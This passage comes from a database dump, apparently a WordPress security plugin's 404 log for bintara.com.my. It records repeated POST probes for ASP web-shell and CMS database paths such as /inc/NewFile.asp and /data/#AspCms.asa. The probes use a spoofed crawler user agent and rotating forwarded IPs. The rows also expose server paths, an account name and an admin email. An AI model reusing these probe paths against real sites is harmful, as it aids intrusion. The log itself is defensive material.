http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"125.211.135.207\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"125.211.135.207\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/inc/NewFile.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/inc/NewFile.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskqrdRi@RFkkQCXDBOFAAAAEo\";s:12:\"REDIRECT_URL\";s:16:\"/inc/NewFile.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52467\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/inc/NewFile.asp\";s:10:\"SCRIPT_URL\";s:16:\"/inc/NewFile.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskqrdRi@RFkkQCXDBOFAAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497130.3357\";s:12:\"REQUEST_TIME\";s:10:\"1571497130\";}}','notice','2019-10-19 14:58:53','2019-10-19 14:58:50',35263544,37077376,'http://bintara.com.my//inc/NewFile.asp',1,0,'125.211.135.207'),(28380,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//inc/NewFile.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"125.82.78.19\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"125.82.78.19\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/inc/NewFile.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/inc/NewFile.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskpbdRi@RFkkQCXDBOEwAAAFM\";s:12:\"REDIRECT_URL\";s:16:\"/inc/NewFile.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52467\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/inc/NewFile.asp\";s:10:\"SCRIPT_URL\";s:16:\"/inc/NewFile.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskpbdRi@RFkkQCXDBOEwAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497125.4147\";s:12:\"REQUEST_TIME\";s:10:\"1571497125\";}}','notice','2019-10-19 14:58:47','2019-10-19 14:58:45',35338016,37148568,'http://bintara.com.my//inc/NewFile.asp',1,0,'125.82.78.19'),(28379,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//data/%23AspCms.asa\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"121.36.82.247\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"121.36.82.247\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#AspCms.asa\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/data/#AspCms.asa\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasklQYF48xX3r6hM@l9PQAAABE\";s:12:\"REDIRECT_URL\";s:17:\"/data/#AspCms.asa\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52094\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#AspCms.asa\";s:10:\"SCRIPT_URL\";s:17:\"/data/#AspCms.asa\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasklQYF48xX3r6hM@l9PQAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497109.4104\";s:12:\"REQUEST_TIME\";s:10:\"1571497109\";}}','notice','2019-10-19 14:58:33','2019-10-19 14:58:30',35266544,37072248,'http://bintara.com.my//data/%23AspCms.asa',1,0,'121.36.82.247'),(28378,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//data/%23AspCms.asa\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"121.46.39.112\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"121.46.39.112\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#AspCms.asa\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/data/#AspCms.asa\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskigYF48xX3r6hM@l9MgAAAAI\";s:12:\"REDIRECT_URL\";s:17:\"/data/#AspCms.asa\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51675\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#AspCms.asa\";s:10:\"SCRIPT_URL\";s:17:\"/data/#AspCms.asa\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskigYF48xX3r6hM@l9MgAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497098.8855\";s:12:\"REQUEST_TIME\";s:10:\"1571497098\";}}','notice','2019-10-19 14:58:21','2019-10-19 14:58:19',35339224,37144416,'http://bintara.com.my//data/%23AspCms.asa',1,0,'121.46.39.112'),(28377,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//data/%23AspCms.asa\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"121.36.188.184\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"121.36.188.184\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#AspCms.asa\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/data/#AspCms.asa\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskgfBciE@oGFkw1schkAAAAQU\";s:12:\"REDIRECT_URL\";s:17:\"/data/#AspCms.asa\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51270\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#AspCms.asa\";s:10:\"SCRIPT_URL\";s:17:\"/data/#AspCms.asa\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskgfBciE@oGFkw1schkAAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497089.4734\";s:12:\"REQUEST_TIME\";s:10:\"1571497089\";}}','notice','2019-10-19 14:58:13','2019-10-19 14:58:10',35263480,37069160,'http://bintara.com.my//data/%23AspCms.asa',1,0,'121.36.188.184'),(28376,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//adm1n/md5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"203.93.40.113\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"203.93.40.113\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/adm1n/md5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/adm1n/md5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskevBciE@oGFkw1schjQAAAQ8\";s:12:\"REDIRECT_URL\";s:14:\"/adm1n/md5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51270\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/adm1n/md5.asp\";s:10:\"SCRIPT_URL\";s:14:\"/adm1n/md5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskevBciE@oGFkw1schjQAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497082.2077\";s:12:\"REQUEST_TIME\";s:10:\"1571497082\";}}','notice','2019-10-19 14:58:04','2019-10-19 14:58:02',35266416,37076832,'http://bintara.com.my//adm1n/md5.asp',1,0,'203.93.40.113'),(28375,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//adm1n/md5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"210.185.200.241\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"210.185.200.241\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/adm1n/md5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/adm1n/md5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskagYF48xX3r6hM@l9CwAAABY\";s:12:\"REDIRECT_URL\";s:14:\"/adm1n/md5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50821\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/adm1n/md5.asp\";s:10:\"SCRIPT_URL\";s:14:\"/adm1n/md5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskagYF48xX3r6hM@l9CwAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497066.6191\";s:12:\"REQUEST_TIME\";s:10:\"1571497066\";}}','notice','2019-10-19 14:57:49','2019-10-19 14:57:47',35342416,37148944,'http://bintara.com.my//adm1n/md5.asp',1,0,'210.185.200.241'),(28374,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/login.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"211.93.4.27\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"211.93.4.27\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskPPivEQeUaFKlM5aefAAAAJM\";s:12:\"REDIRECT_URL\";s:16:\"/admin/login.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/login.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskPPivEQeUaFKlM5aefAAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497020.2363\";s:12:\"REQUEST_TIME\";s:10:\"1571497020\";}}','notice','2019-10-19 14:57:02','2019-10-19 14:57:00',35266696,37065232,'http://bintara.com.my//admin/login.asp',1,0,'211.93.4.27'),(28373,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/login.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.71.178.231\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.71.178.231\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaskNfivEQeUaFKlM5aedwAAAJg\";s:12:\"REDIRECT_URL\";s:16:\"/admin/login.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/login.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaskNfivEQeUaFKlM5aedwAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497013.7004\";s:12:\"REQUEST_TIME\";s:10:\"1571497013\";}}','notice','2019-10-19 14:56:55','2019-10-19 14:56:54',35337704,37134880,'http://bintara.com.my//admin/login.asp',1,0,'124.71.178.231'),(28372,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 